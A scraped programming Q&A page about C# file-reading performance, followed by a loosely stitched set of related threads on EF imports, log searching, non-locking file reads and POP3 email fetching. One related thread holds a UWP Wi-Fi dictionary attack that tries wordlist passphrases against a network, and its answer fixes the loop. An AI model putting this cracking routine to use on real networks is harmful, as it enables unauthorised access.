I'm merging text files (.itf) located in a folder, applying some logic along the way. When I compile it as a 32-bit console application (.NET 4.6), everything works fine, except that I get OutOfMemoryExceptions when there is a lot of data in the folders. Compiling to 64-bit would solve that problem, but the 64-bit build runs extremely slowly compared to the 32-bit process (more than 15 times slower).
I tried it with BufferedStream and ReadAllLines, but both perform very poorly. The profiler tells me that these methods use 99% of the time. I don't know where the problem is...
Here's the code:
private static void readData(Dictionary<string, Topic> topics)
{
foreach (string file in Directory.EnumerateFiles(Path, "*.itf"))
{
Topic currentTopic = null;
Table currentTable = null;
Object currentObject = null;
using (var fs = File.Open(file, FileMode.Open))
{
using (var bs = new BufferedStream(fs))
{
using (var sr = new StreamReader(bs, Encoding.Default))
{
string line;
while ((line = sr.ReadLine()) != null)
{
if (line.IndexOf("ETOP") > -1)
{
currentTopic = null;
}
else if (line.IndexOf("ETAB") > -1)
{
currentTable = null;
}
else if (line.IndexOf("ELIN") > -1)
{
currentObject = null;
}
else if (line.IndexOf("MTID") > -1)
{
MTID = line.Replace("MTID ", "");
}
else if (line.IndexOf("MODL") > -1)
{
MODL = line.Replace("MODL ", "");
}
else if (line.IndexOf("TOPI") > -1)
{
var name = line.Replace("TOPI ", "");
if (topics.ContainsKey(name))
{
currentTopic = topics[name];
}
else
{
var topic = new Topic(name);
currentTopic = topic;
topics.Add(name, topic);
}
}
else if (line.IndexOf("TABL") > -1)
{
var name = line.Replace("TABL ", "");
if (currentTopic.Tables.ContainsKey(name))
{
currentTable = currentTopic.Tables[name];
}
else
{
var table = new Table(name);
currentTable = table;
currentTopic.Tables.Add(name, table);
}
}
else if (line.IndexOf("OBJE") > -1)
{
if (currentTable.Name != "Metadata" || currentTable.Objects.Count == 0)
{
var shortLine = line.Replace("OBJE ", "");
var obje = new Object(shortLine.Substring(shortLine.IndexOf(" ")));
currentObject = obje;
currentTable.Objects.Add(obje);
}
}
else if (currentTopic != null && currentTable != null && currentObject != null)
{
currentObject.Data.Add(line);
}
}
}
}
}
}
}
The biggest problem with your program is that, when you run it in 64-bit mode, it can read a lot more files. Which is nice: a 64-bit process has a thousand times more address space than a 32-bit process, so running out of it is exceedingly unlikely.
But you do not get a thousand times more RAM.
The universal principle of "there is no free lunch" is at work here. Having enough RAM matters a great deal in a program like this. First and foremost, it is used by the file system cache, that magical operating system feature that makes it look like reading files from a disk is very cheap. It is not cheap at all; it is one of the slowest things you can do in a program, but the cache is very good at hiding it. You invoke it when you run your program more than once: the second and subsequent times you don't read from the disk at all. That's a pretty dangerous feature and very hard to avoid when you test your program; it gives you very unrealistic assumptions about how efficient the program is.
The problem with a 64-bit process is that it easily makes the file system cache ineffective. Because it can read a lot more files, it overwhelms the cache and old file data gets evicted. Now the second time you run your program it will not be fast anymore; the files you read will no longer be in the cache and must be read from the disk. You'll now see the real perf of your program, the way it will behave in production. That's a good thing, even though you don't like it very much :)
The secondary problem with RAM is the lesser one: if you allocate a lot of memory to store the file data, then you force the operating system to find the RAM to store it. That can cause a lot of hard page faults, incurred when it must unmap memory used by another process, or by yours, to free up the RAM that you need. A generic problem called "thrashing". Page faults are something you can see in Task Manager; use View > Select Columns to add the column.
Given that the file system cache is the most likely source of the slowdown, a simple test you can do is to reboot your machine, which ensures that the cache does not hold any of the file data, and then run the 32-bit version. The prediction is that it will also be slow, and that BufferedStream and ReadAllLines will be the bottlenecks, like they should be.
One final note: even though your program doesn't match the pattern, you cannot make strong assumptions about .NET 4.6 perf problems yet. Not until this very nasty bug gets fixed.
A few tips:
Why use File.Open, then BufferedStream, then StreamReader when you can do the job with just a StreamReader, which is buffered already?
Reorder your conditions so that the one that occurs most often comes first.
Consider reading all lines and then using Parallel.ForEach (see the sketch below).
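A minimal sketch of the first two tips, assuming the same Topic/Table/Object model and Path field as in the question, and assuming the keyword markers appear at the start of each line: a lone StreamReader is already buffered internally, and the marker checks are ordered so that the most frequent ones are tested first.
foreach (string file in Directory.EnumerateFiles(Path, "*.itf"))
{
    // A StreamReader buffers internally, so the FileStream/BufferedStream
    // wrappers from the original code are not needed.
    using (var sr = new StreamReader(file, Encoding.Default))
    {
        string line;
        while ((line = sr.ReadLine()) != null)
        {
            // Check the markers that occur most often first; plain data
            // lines (no marker at all) fall through to the last branch.
            if (line.StartsWith("OBJE")) { /* handle object line */ }
            else if (line.StartsWith("TABL")) { /* handle table line */ }
            else if (line.StartsWith("TOPI")) { /* handle topic line */ }
            // ... remaining markers, then the data-line branch last ...
        }
    }
}
For the third tip, the outer foreach could become Parallel.ForEach over the file names, but only if access to the shared topics dictionary is synchronized (for example with a lock), since several files would then be parsed at once.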
I was able to solve it. It seems there is a bug in the .NET compiler: unchecking the code-optimization checkbox in VS2015 led to a huge performance increase. Now it runs with performance similar to the 32-bit version. My final version, with some optimizations:
private static void readData(ref Dictionary<string, Topic> topics)
{
Regex rgxOBJE = new Regex("OBJE [0-9]+ ", RegexOptions.IgnoreCase | RegexOptions.Compiled);
Regex rgxTABL = new Regex("TABL ", RegexOptions.IgnoreCase | RegexOptions.Compiled);
Regex rgxTOPI = new Regex("TOPI ", RegexOptions.IgnoreCase | RegexOptions.Compiled);
Regex rgxMTID = new Regex("MTID ", RegexOptions.IgnoreCase | RegexOptions.Compiled);
Regex rgxMODL = new Regex("MODL ", RegexOptions.IgnoreCase | RegexOptions.Compiled);
foreach (string file in Directory.EnumerateFiles(Path, "*.itf"))
{
if (file.IndexOf("itf_merger_result") == -1)
{
Topic currentTopic = null;
Table currentTable = null;
Object currentObject = null;
using (var sr = new StreamReader(file, Encoding.Default))
{
Stopwatch sw = new Stopwatch();
sw.Start();
Console.WriteLine(file + " read, parsing ...");
string line;
while ((line = sr.ReadLine()) != null)
{
if (line.IndexOf("OBJE") > -1)
{
if (currentTable.Name != "Metadata" || currentTable.Objects.Count == 0)
{
var obje = new Object(rgxOBJE.Replace(line, ""));
currentObject = obje;
currentTable.Objects.Add(obje);
}
}
else if (line.IndexOf("TABL") > -1)
{
var name = rgxTABL.Replace(line, "");
if (currentTopic.Tables.ContainsKey(name))
{
currentTable = currentTopic.Tables[name];
}
else
{
var table = new Table(name);
currentTable = table;
currentTopic.Tables.Add(name, table);
}
}
else if (line.IndexOf("TOPI") > -1)
{
var name = rgxTOPI.Replace(line, "");
if (topics.ContainsKey(name))
{
currentTopic = topics[name];
}
else
{
var topic = new Topic(name);
currentTopic = topic;
topics.Add(name, topic);
}
}
else if (line.IndexOf("ETOP") > -1)
{
currentTopic = null;
}
else if (line.IndexOf("ETAB") > -1)
{
currentTable = null;
}
else if (line.IndexOf("ELIN") > -1)
{
currentObject = null;
}
else if (currentTopic != null && currentTable != null && currentObject != null)
{
currentObject.Data.Add(line);
}
else if (line.IndexOf("MTID") > -1)
{
MTID = rgxMTID.Replace(line, "");
}
else if (line.IndexOf("MODL") > -1)
{
MODL = rgxMODL.Replace(line, "");
}
}
sw.Stop();
Console.WriteLine(file + " parsed in {0}s", sw.ElapsedMilliseconds / 1000.0);
}
}
}
}
Unchecking the code-optimization checkbox should typically result in performance slowdowns, not speedups. There may be an issue in the VS 2015 product. Please provide a stand-alone repro case, with an input set to your program that demonstrates the performance problem, and report it at: http://connect.microsoft.com/
Related
I'm working on a utility to read through a JSON file I've been given and transform it into SQL Server. My weapon of choice is a .NET Core console app (I'm trying to do all of my new work with .NET Core unless there is a compelling reason not to). I have the whole thing "working", but there is clearly a problem somewhere because the performance is truly horrifying, almost to the point of being unusable.
The JSON file is approximately 27 MB and contains a main array of 214 elements, each of which contains a couple of fields along with an array of 150-350 records (that array has several fields and potentially a small <5 record array or two). Total records are approximately 35,000.
In the code below I've changed some names and stripped out a few of the fields to keep it more readable, but all of the logic and code that does actual work is unchanged.
Keep in mind, I've done a lot of testing with the placement and number of calls to SaveChanges(), thinking initially that the number of trips to the DB was the problem. Although the version below calls SaveChanges() once for each iteration of the 214-element loop, I've tried moving it outside of the entire looping structure and there is no discernible change in performance. In other words, with zero trips to the DB, this is still SLOW. How slow, you ask? How does > 24 hours to run hit you? I'm willing to try anything at this point and am even considering moving the whole process into SQL Server, but I would much rather work in C# than T-SQL.
static void Main(string[] args)
{
string statusMsg = String.Empty;
JArray sets = JArray.Parse(File.ReadAllText(@"C:\Users\Public\Downloads\ImportFile.json"));
try
{
using (var _db = new WidgetDb())
{
for (int s = 0; s < sets.Count; s++)
{
Console.WriteLine($"{s.ToString()}: {sets[s]["name"]}");
// First we create the Set
Set eSet = new Set()
{
SetCode = (string)sets[s]["code"],
SetName = (string)sets[s]["name"],
Type = (string)sets[s]["type"],
Block = (string)sets[s]["block"] ?? ""
};
_db.Entry(eSet).State = Microsoft.EntityFrameworkCore.EntityState.Added;
JArray widgets = sets[s]["widgets"].ToObject<JArray>();
for (int c = 0; c < widgets.Count; c++)
{
Widget eWidget = new Widget()
{
WidgetId = (string)widgets[c]["id"],
Layout = (string)widgets[c]["layout"] ?? "",
WidgetName = (string)widgets[c]["name"],
WidgetNames = "",
ReleaseDate = releaseDate,
SetCode = (string)sets[s]["code"]
};
// WidgetColors
if (widgets[c]["colors"] != null)
{
JArray widgetColors = widgets[c]["colors"].ToObject<JArray>();
for (int cc = 0; cc < widgetColors.Count; cc++)
{
WidgetColor eWidgetColor = new WidgetColor()
{
WidgetId = eWidget.WidgetId,
Color = (string)widgets[c]["colors"][cc]
};
_db.Entry(eWidgetColor).State = Microsoft.EntityFrameworkCore.EntityState.Added;
}
}
// WidgetTypes
if (widgets[c]["types"] != null)
{
JArray widgetTypes = widgets[c]["types"].ToObject<JArray>();
for (int ct = 0; ct < widgetTypes.Count; ct++)
{
WidgetType eWidgetType = new WidgetType()
{
WidgetId = eWidget.WidgetId,
Type = (string)widgets[c]["types"][ct]
};
_db.Entry(eWidgetType).State = Microsoft.EntityFrameworkCore.EntityState.Added;
}
}
// WidgetVariations
if (widgets[c]["variations"] != null)
{
JArray widgetVariations = widgets[c]["variations"].ToObject<JArray>();
for (int cv = 0; cv < widgetVariations.Count; cv++)
{
WidgetVariation eWidgetVariation = new WidgetVariation()
{
WidgetId = eWidget.WidgetId,
Variation = (string)widgets[c]["variations"][cv]
};
_db.Entry(eWidgetVariation).State = Microsoft.EntityFrameworkCore.EntityState.Added;
}
}
}
_db.SaveChanges();
}
}
statusMsg = "Import Complete";
}
catch (Exception ex)
{
statusMsg = ex.Message + " (" + ex.InnerException + ")";
}
Console.WriteLine(statusMsg);
Console.ReadKey();
}
I had an issue with that kind of code: lots of loops and tons of changing state.
Any change/manipulation you make in the _db context generates a "trace" of it, and that tracking makes your context slower over time. Read more here.
The fix for me was to create a new EF context (_db) at some key points. It saved me a few hours per run!
You could try to create a new instance of _db for each iteration of the loop over the main array of 214 elements (see the sketch below).
If that makes no difference, try adding some Stopwatch timers to get a better idea of what/where is taking so long.
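A minimal sketch of that idea, assuming the same WidgetDb context and entities as in the question (the loop body itself stays exactly as in the original code): each iteration gets a fresh context, so the change tracker never holds more than one set's worth of entities.
for (int s = 0; s < sets.Count; s++)
{
    // A fresh context per set keeps the EF change tracker small.
    using (var _db = new WidgetDb())
    {
        // Optional: change detection is not needed for pure inserts.
        _db.ChangeTracker.AutoDetectChangesEnabled = false;

        // ... build and Add the Set, Widgets, WidgetColors, WidgetTypes and
        //     WidgetVariations for sets[s] exactly as in the original loop ...

        _db.SaveChanges();
    }
}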
If you're making thousands of updates then EF is not really the way to go. Something like SqlBulkCopy will do the trick (see the sketch after the BulkWriter example below).
You could try the BulkWriter library:
IEnumerable<string> ReadFile(string path)
{
using (var stream = File.OpenRead(path))
using (var reader = new StreamReader(stream))
{
while (reader.Peek() >= 0)
{
yield return reader.ReadLine();
}
}
}
var items =
from line in ReadFile(@"C:\products.csv")
let values = line.Split(',')
select new Product {Sku = values[0], Name = values[1]};
then
using (var bulkWriter = new BulkWriter<Product>(connectionString)) {
bulkWriter.WriteToDatabase(items);
}
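For the plain SqlBulkCopy route mentioned above, here is a hedged sketch; the "Widgets" destination table and the idea of staging the rows in a DataTable are assumptions for illustration, not something taken from the question.
using System.Data;
using System.Data.SqlClient;

static void BulkInsertWidgets(string connectionString, DataTable widgets)
{
    // 'widgets' is a DataTable whose columns match the destination table.
    using (var bulkCopy = new SqlBulkCopy(connectionString))
    {
        bulkCopy.DestinationTableName = "Widgets"; // assumed table name
        bulkCopy.BatchSize = 5000;                 // tune for your workload
        bulkCopy.WriteToServer(widgets);           // streams all rows to SQL Server
    }
}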
I'm working on a proof of concept at the moment, just for fun (and for YouTube). The thing I am trying to prove is that I can efficiently "hack" WiFi passwords using UWP and C# for Windows. I don't know of any Wi-Fi cracking tools that are designed specifically for Windows 10 devices (PC, Tablet, XboxOne, Mobile etc)...
So I have actually managed to perform a dictionary-style attack (on my own WiFi network, of course). However, my function occasionally seems to crash completely when running the "hack".
Please consider the fact that this is completely white hat hacking I am talking about here, nothing illegal is intended.
Any help with a reason why this crashes is appreciated...
private async void connectWiFi_Tapped(object sender, TappedRoutedEventArgs e)
{
int success = 0;
var picker = new FileOpenPicker();
picker.ViewMode = PickerViewMode.Thumbnail;
picker.SuggestedStartLocation = PickerLocationId.DocumentsLibrary;
picker.FileTypeFilter.Add(".txt");
StorageFile file = await picker.PickSingleFileAsync();
if (file != null)
{
do
{
string _line;
using (var inputStream = await file.OpenReadAsync())
using (var classicStream = inputStream.AsStreamForRead())
using (var streamReader = new StreamReader(classicStream))
{
while (streamReader.Peek() >= 0)
{
if (success == 0)
{
_line = streamReader.ReadLine();
setConnectionStatus("Status: Checking WiFi network using passphrase " + _line);
if (await checkWifiPassword(_line) == true)
{
success = 1;
setConnectionStatus("SUCCESS: Password successfully identified as " + _line);
firstAdapter.Disconnect();
var msg = new MessageDialog(connectionStatus.Text);
await msg.ShowAsync();
}
else
{
success = 0;
setConnectionStatus("FAIL: Password " + _line + "is incorrect. Checking next password...");
}
}
}
}
} while (success == 0);
}
}
This is the code that actually runs a dictionary-style "hack" on a selected network. The code to actually connect to the network is as follows:
private async Task<bool> checkWifiPassword(string passPhrase)
{
var credential = new PasswordCredential();
WiFiReconnectionKind reconnectionKind = WiFiReconnectionKind.Manual;
credential.Password = passPhrase;
var selectedNetwork = null as WiFiNetworkDisplay;
foreach (var network in ResultCollection)
{
if (WifiNetworks.SelectedItem.ToString() == network.Ssid)
{
selectedNetwork = network as WiFiNetworkDisplay;
}
}
if (selectedNetwork != null)
{
var result = await firstAdapter.ConnectAsync(selectedNetwork.AvailableNetwork, reconnectionKind, credential);
if (result.ConnectionStatus == WiFiConnectionStatus.Success)
{
return true;
}
else
{
return false;
}
}
else
{
return false;
}
}
Does anyone have any idea what I am missing here?
Any help appreciated.
Thanks
Consider this loop
while (streamReader.Peek() >= 0)
{
if (success == 0)
{
_line = streamReader.ReadLine();
setConnectionStatus("Status: Checking WiFi network using passphrase " + _line);
if (await checkWifiPassword(_line) == true)
{
success = 1;
setConnectionStatus("SUCCESS: Password successfully identified as " + _line);
firstAdapter.Disconnect();
var msg = new MessageDialog(connectionStatus.Text);
await msg.ShowAsync();
}
else
{
success = 0;
setConnectionStatus("FAIL: Password " + _line + "is incorrect. Checking next password...");
}
}
}
This can lead to an infinite loop:
Imagine the following dictionary file:
abc
bcd
cde
where abc is the correct password.
You peek the stream, you get 97 (decimal ASCII for letter a), fine.
Success is 0, as we just started.
You read the next line.
You check the password, it works, cool.
You set success to 1, show the message, etc.
User closes the message dialog, ShowAsync() returns.
End of first loop iteration, let's start another one.
You peek the stream, you get 98 (ASCII for letter b), which is >= 0, so the loop continues.
Success is not zero, so we skip the entire body of the if; end of second loop iteration.
You peek the stream again; the read position did not move since the last peek, so you get that same 98 again.
And you skip again: an infinite loop.
EDIT - there is actually another infinite loop there
I will not detail this as much, but take a look at the outer do-while loop. That loop runs until success. But if the inner loop exhausts all possibilities and does not find the correct password, success will remain 0. That means the do-while will run once again, the inner loop will go through the file again, which obviously will not find a solution either, and so on.
Solution
There are many ways that code could be cleaned up, but the quick fix is to break after msg.ShowAsync();.
More details (that would belong to codereview.stackexchange.com):
Also, I would not Peek the StreamReader; use EndOfStream for that job. And you can skip the inner if: simply break once you have found a correct password. You can drop the outer loop as well. If you complete the inner loop without setting the success flag (which should be a boolean), you can report to the user that no password worked.
I would do something along the lines of: (take it as a pseudo code, might not compile as it is)
private async void connectWiFi_Tapped(object sender, TappedRoutedEventArgs e)
{
var picker = new FileOpenPicker();
picker.ViewMode = PickerViewMode.Thumbnail;
picker.SuggestedStartLocation = PickerLocationId.DocumentsLibrary;
picker.FileTypeFilter.Add(".txt");
StorageFile file = await picker.PickSingleFileAsync();
if (file != null)
{
bool success = false;
string _line;
using (var inputStream = await file.OpenReadAsync())
using (var classicStream = inputStream.AsStreamForRead())
using (var streamReader = new StreamReader(classicStream))
{
while (!streamReader.EndOfStream)
{
_line = streamReader.ReadLine();
setConnectionStatus("Status: Checking WiFi network using passphrase " + _line);
if (await checkWifiPassword(_line) == true)
{
success = true;
setConnectionStatus("SUCCESS: Password successfully identified as " + _line);
firstAdapter.Disconnect();
var msg = new MessageDialog(connectionStatus.Text);
await msg.ShowAsync();
break;
}
else
{
setConnectionStatus("FAIL: Password " + _line + "is incorrect. Checking next password...");
}
}
}
if(!success){ /* report to the user*/ }
    }
}
I am facing a performance issue while searching the content of files. I am using the FileStream class to read the files (~10 files are involved in each search, each ~70 MB in size). However, all of these files are simultaneously being accessed and updated by another process during my search, so I cannot read them in one go and have to rely on a buffer size. Reading with a buffer size on the StreamReader takes 3 minutes, even though I am using regex.
Has anyone come across a similar situation and could offer any pointers on improving the performance of file search?
Code Snippet
private static int BufferSize = 32768;
using (FileStream fs = File.Open(filePath, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))
{
using (TextReader txtReader = new StreamReader(fs, Encoding.UTF8, true, BufferSize))
{
System.Text.RegularExpressions.Regex patternMatching = new System.Text.RegularExpressions.Regex(@"(?=\d{4}-\d{2}-\d{2}\s\d{2}:\d{2}:\d{2})(.*?)(?=\n\d{4}-\d{2}-\d{2}\s\d{2}:\d{2}:\d{2})", System.Text.RegularExpressions.RegexOptions.IgnoreCase);
System.Text.RegularExpressions.Regex dateStringMatch = new Regex(@"^\d{4}-\d{2}-\d{2}\s\d{2}:\d{2}:\d{2}");
char[] temp = new char[1048576];
while (txtReader.ReadBlock(temp, 0, 1048576) > 0)
{
StringBuilder parseString = new StringBuilder();
parseString.Append(temp);
if (temp[1023].ToString() != Environment.NewLine)
{
parseString.Append(txtReader.ReadLine());
while (txtReader.Peek() > 0 && !(txtReader.Peek() >= 48 && txtReader.Peek() <= 57))
{
parseString.Append(txtReader.ReadLine());
}
}
if (parseString.Length > 0)
{
string[] allRecords = patternMatching.Split(parseString.ToString());
foreach (var item in allRecords)
{
var contentString = item.Trim();
if (!string.IsNullOrWhiteSpace(contentString))
{
var matches = dateStringMatch.Matches(contentString);
if (matches.Count > 0)
{
var rowDatetime = DateTime.MinValue;
if (DateTime.TryParse(matches[0].Value, out rowDatetime))
{
if (rowDatetime >= startDate && rowDatetime < endDate)
{
if (contentString.ToLowerInvariant().Contains(searchText))
{
var result = new SearchResult
{
LogFileType = logFileType,
Message = string.Format(messageTemplateNew, item),
Timestamp = rowDatetime,
ComponentName = componentName,
FileName = filePath,
ServerName = serverName
};
searchResults.Add(result);
}
}
}
}
}
}
}
}
}
}
return searchResults;
Some time ago I had to analyse many FileZilla Server log files, each >120 MB.
I used a simple List to hold all lines of each log file and then had great performance searching for specific lines.
List<string> fileContent = File.ReadAllLines(pathToFile).ToList();
But in your case I think the main reason for the bad performance isn't reading the file. Try putting a Stopwatch around some parts of your loop to check where most of the time is spent (see the sketch below). Regex and TryParse can be very time-consuming if used many times in a loop like yours.
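A minimal sketch of that kind of instrumentation, using the variable names from the snippet in the question: time the regex split and the per-record work separately, so it is obvious which part dominates.
var splitWatch = new System.Diagnostics.Stopwatch();
var recordWatch = new System.Diagnostics.Stopwatch();

splitWatch.Start();
string[] allRecords = patternMatching.Split(parseString.ToString());
splitWatch.Stop();

recordWatch.Start();
foreach (var item in allRecords)
{
    // ... existing DateTime.TryParse / Contains / SearchResult logic ...
}
recordWatch.Stop();

Console.WriteLine("split: {0} ms, per-record work: {1} ms",
    splitWatch.ElapsedMilliseconds, recordWatch.ElapsedMilliseconds);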
I do not want to read the whole file at any point. I know there are answers to that question; I want to read only the first or last line.
I know that my code locks the file that it's reading, for two reasons: 1) the application that writes to the file crashes intermittently when I run my little app with this code, but it never crashes when I am not running this code; and 2) there are a few articles that will tell you that File.ReadLines locks the file.
There are some similar questions, but the answers seem to involve reading the whole file, which is slow for large files and therefore not what I want to do. My requirement to only read the last line most of the time also differs from what I have read about.
I need to know how to read the first line (header row) and the last line (latest row). I do not want to read all lines at any point in my code, because this file can become huge and reading the entire file would become slow.
I know that
line = File.ReadLines(fullFilename).First().Replace("\"", "");
... is the same as ...
FileStream fs = new FileStream(@fullFilename, FileMode.Open, FileAccess.Read, FileShare.Read);
My question is: how can I repeatedly read the first and last lines of a file which may be being written to by another application, without locking it in any way? I have no control over the application that is writing to the file. It is a data log which can be appended to at any time. The reason I am listening in this way is that this log can be appended to for days on end. I want to see the latest data in this log in my own C# programme without waiting for the log to finish being written.
My code to call the reading / listening function ...
//Start Listening to the "data log"
private void btnDeconstructCSVFile_Click(object sender, EventArgs e)
{
MySandbox.CopyCSVDataFromLogFile copyCSVDataFromLogFile = new MySandbox.CopyCSVDataFromLogFile();
copyCSVDataFromLogFile.checkForLogData();
}
My class which does the listening. For now it simply adds the data to 2 generics lists ...
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using MySandbox.Classes;
using System.IO;
namespace MySandbox
{
public class CopyCSVDataFromLogFile
{
static private List<LogRowData> listMSDataRows = new List<LogRowData>();
static String fullFilename = string.Empty;
static LogRowData previousLineLogRowList = new LogRowData();
static LogRowData logRowList = new LogRowData();
static LogRowData logHeaderRowList = new LogRowData();
static Boolean checking = false;
public void checkForLogData()
{
//Initialise
string[] logHeaderArray = new string[] { };
string[] badDataRowsArray = new string[] { };
//Get the latest full filename (file with new data)
//Assumption: only 1 file is written to at a time in this directory.
String directory = "C:\\TestDir\\";
string pattern = "*.csv";
var dirInfo = new DirectoryInfo(directory);
var file = (from f in dirInfo.GetFiles(pattern) orderby f.LastWriteTime descending select f).First();
fullFilename = directory + file.ToString(); //This is the full filepath and name of the latest file in the directory!
if (logHeaderArray.Length == 0)
{
//Populate the Header Row
logHeaderRowList = getRow(fullFilename, true);
}
LogRowData tempLogRowList = new LogRowData();
if (!checking)
{
//Read the latest data in an asynchronous loop
callDataProcess();
}
}
private async void callDataProcess()
{
checking = true; //Begin checking
await checkForNewDataAndSaveIfFound();
}
private static Task checkForNewDataAndSaveIfFound()
{
return Task.Run(() => //Call the async "Task"
{
while (checking) //Loop (asynchronously)
{
LogRowData tempLogRowList = new LogRowData();
if (logHeaderRowList.ValueList.Count == 0)
{
//Populate the Header row
logHeaderRowList = getRow(fullFilename, true);
}
else
{
//Populate Data row
tempLogRowList = getRow(fullFilename, false);
if ((!Enumerable.SequenceEqual(tempLogRowList.ValueList, previousLineLogRowList.ValueList)) &&
(!Enumerable.SequenceEqual(tempLogRowList.ValueList, logHeaderRowList.ValueList)))
{
logRowList = getRow(fullFilename, false);
listMSDataRows.Add(logRowList);
previousLineLogRowList = logRowList;
}
}
//System.Threading.Thread.Sleep(10); //Wait for next row.
}
});
}
private static LogRowData getRow(string fullFilename, bool isHeader)
{
string line;
string[] logDataArray = new string[] { };
LogRowData logRowListResult = new LogRowData();
try
{
if (isHeader)
{
//Assign first (header) row data.
//Works but seems to block writing to the file!!!!!!!!!!!!!!!!!!!!!!!!!!!
line = File.ReadLines(fullFilename).First().Replace("\"", "");
}
else
{
//Assign data as last row (default behaviour).
line = File.ReadLines(fullFilename).Last().Replace("\"", "");
}
logDataArray = line.Split(',');
//Copy Array to Generics List and remove last value if it's empty.
for (int i = 0; i < logDataArray.Length; i++)
{
if (i < logDataArray.Length)
{
if (i < logDataArray.Length - 1)
{
//Value is not at the end, from observation, these always have a value (even if it's zero) and so we'll store the value.
logRowListResult.ValueList.Add(logDataArray[i]);
}
else
{
//This is the last value
if (logDataArray[i].Replace("\"", "").Trim().Length > 0)
{
//In this case, the last value is not empty, store it as normal.
logRowListResult.ValueList.Add(logDataArray[i]);
}
else { /*The last value is empty, e.g. "123,456,"; the final comma denotes another field but this field is empty so we will ignore it now. */ }
}
}
}
}
catch (Exception ex)
{
if (ex.Message == "Sequence contains no elements")
{ /*Empty file, no problem. The code will safely loop and then will pick up the header when it appears.*/ }
else
{
//TODO: catch this error properly
Int32 problemID = 10; //Unknown ERROR.
}
}
return logRowListResult;
}
}
}
I found the answer in a combination of other questions: one answer explaining how to read from the end of a file, which I adapted so that it reads only one line from the end of the file, and another explaining how to read the entire file without locking it (I did not want to read the entire file, but the not-locking part was useful). So now you can read the last line of the file (if it contains end-of-line characters) without locking it. For other end-of-line delimiters, just replace my 10 and 13 with your end-of-line character bytes...
Add the method below to public class CopyCSVDataFromLogFile
private static string Reverse(string str)
{
char[] arr = new char[str.Length];
for (int i = 0; i < str.Length; i++)
arr[i] = str[str.Length - 1 - i];
return new string(arr);
}
and replace this line ...
line = File.ReadLines(fullFilename).Last().Replace("\"", "");
with this code block ...
Int32 endOfLineCharacterCount = 0;
Int32 previousCharByte = 0;
Int32 currentCharByte = 0;
//Read the file, from the end, for 1 line, allowing other programmes to access it for read and write!
using (FileStream reader = new FileStream(fullFilename, FileMode.Open, FileAccess.Read, FileShare.ReadWrite, 0x1000, FileOptions.SequentialScan))
{
int i = 0;
StringBuilder lineBuffer = new StringBuilder();
int byteRead;
while ((-i < reader.Length) /*Belt and braces: if there were no end of line characters, reading beyond the file would give a catastrophic error here (to be avoided thus).*/
&& (endOfLineCharacterCount < 2)/*Exit Condition*/)
{
reader.Seek(--i, SeekOrigin.End);
byteRead = reader.ReadByte();
currentCharByte = byteRead;
//Exit condition: the first 2 characters we read (reading backwards, remember) were end-of-line bytes (LF, then CR).
//So when we read the second end of line, we have read 1 whole line (the last line in the file)
//and we must exit now.
if (currentCharByte == 13 && previousCharByte == 10)
{
endOfLineCharacterCount++;
}
if (byteRead == 10 && lineBuffer.Length > 0)
{
line += Reverse(lineBuffer.ToString());
lineBuffer.Remove(0, lineBuffer.Length);
}
lineBuffer.Append((char)byteRead);
previousCharByte = byteRead;
}
reader.Close();
}
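The same non-locking idea works for the header row too. Below is a small helper of my own (an assumption on my part, not taken from the linked answers) that replaces line = File.ReadLines(fullFilename).First().Replace("\"", ""): it opens the FileStream with FileShare.ReadWrite so the logging application can keep appending while the first line is read.
private static string readFirstLineShared(string fullFilename)
{
    //Open for shared read/write so the writer is never blocked.
    using (var fs = new FileStream(fullFilename, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))
    using (var reader = new StreamReader(fs))
    {
        //Returns an empty string for an empty file instead of throwing.
        return (reader.ReadLine() ?? string.Empty).Replace("\"", "");
    }
}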
It is possible using OpenPop.dll:
Pop3Client objPOP3Client = new Pop3Client();
int intTotalEmail = 0;
DataTable dtEmail = new DataTable();
object[] objMessageParts;
try
{
dtEmail = GetAllEmailStructure();
if (objPOP3Client.Connected)
objPOP3Client.Disconnect();
objPOP3Client.Connect(strHostName, intPort, bulUseSSL);
try
{
objPOP3Client.Authenticate(strUserName, new Common()._Decode(strPassword));
intTotalEmail = objPOP3Client.GetMessageCount();
AddMapping();
for (int i = 1; i <= intTotalEmail; i++)
{
objMessageParts = GetMessageContent(i, ref objPOP3Client, dtExistMailList);
if (objMessageParts != null && objMessageParts[0].ToString() == "0")
{
AddToDtEmail(objMessageParts, i, dtEmail, dtUserList, dtTicketIDList, dtBlacklistEmails, dtBlacklistSubject, dtBlacklistDomains);
}
}
}
catch (Exception ex)
{
}
}
catch (Exception ex)
{
ParserLogError(ex, "GetAllEmail()");
}
finally
{
if (objPOP3Client.Connected)
objPOP3Client.Disconnect();
}
// function
public object[] GetMessageContent(int intMessageNumber, ref Pop3Client objPOP3Client, DataTable dtExistingMails)
{
object[] strArrMessage = new object[10];
Message objMessage;
MessagePart plainTextPart = null, HTMLTextPart = null;
string strMessageId = "";
try
{
strArrMessage[0] = "";
strArrMessage[1] = "";
strArrMessage[2] = "";
strArrMessage[3] = "";
strArrMessage[4] = "";
strArrMessage[5] = "";
strArrMessage[6] = "";
strArrMessage[7] = null;
strArrMessage[8] = null;
strArrMessage[7] = "";
strArrMessage[8] = "";
objMessage = objPOP3Client.GetMessage(intMessageNumber);
strMessageId = (objMessage.Headers.MessageId == null ? "" : objMessage.Headers.MessageId.Trim());
if (!IsExistMessageID(dtExistingMails, strMessageId)) //check in data base message id is exists or not
{
strArrMessage[0] = "0";
strArrMessage[1] = objMessage.Headers.From.Address.Trim(); // From EMail Address
strArrMessage[2] = objMessage.Headers.From.DisplayName.Trim(); // From EMail Name
strArrMessage[3] = objMessage.Headers.Subject.Trim();// Mail Subject
plainTextPart = objMessage.FindFirstPlainTextVersion();
strArrMessage[4] = (plainTextPart == null ? "" : plainTextPart.GetBodyAsText().Trim());
HTMLTextPart = objMessage.FindFirstHtmlVersion();
strArrMessage[5] = (HTMLTextPart == null ? "" : HTMLTextPart.GetBodyAsText().Trim());
strArrMessage[6] = strMessageId;
List<MessagePart> attachment = objMessage.FindAllAttachments();
strArrMessage[7] = null;
strArrMessage[8] = null;
if (attachment.Count > 0)
{
if (attachment[0] != null && attachment[0].IsAttachment)
{
strArrMessage[7] = attachment[0].FileName.Trim();
strArrMessage[8] = attachment[0];
}
}
}
else
{
strArrMessage[0] = "1";
}
}
catch (Exception ex)
{
ParserLogError(ex, "GetMessageContent()");
}
return strArrMessage;
}
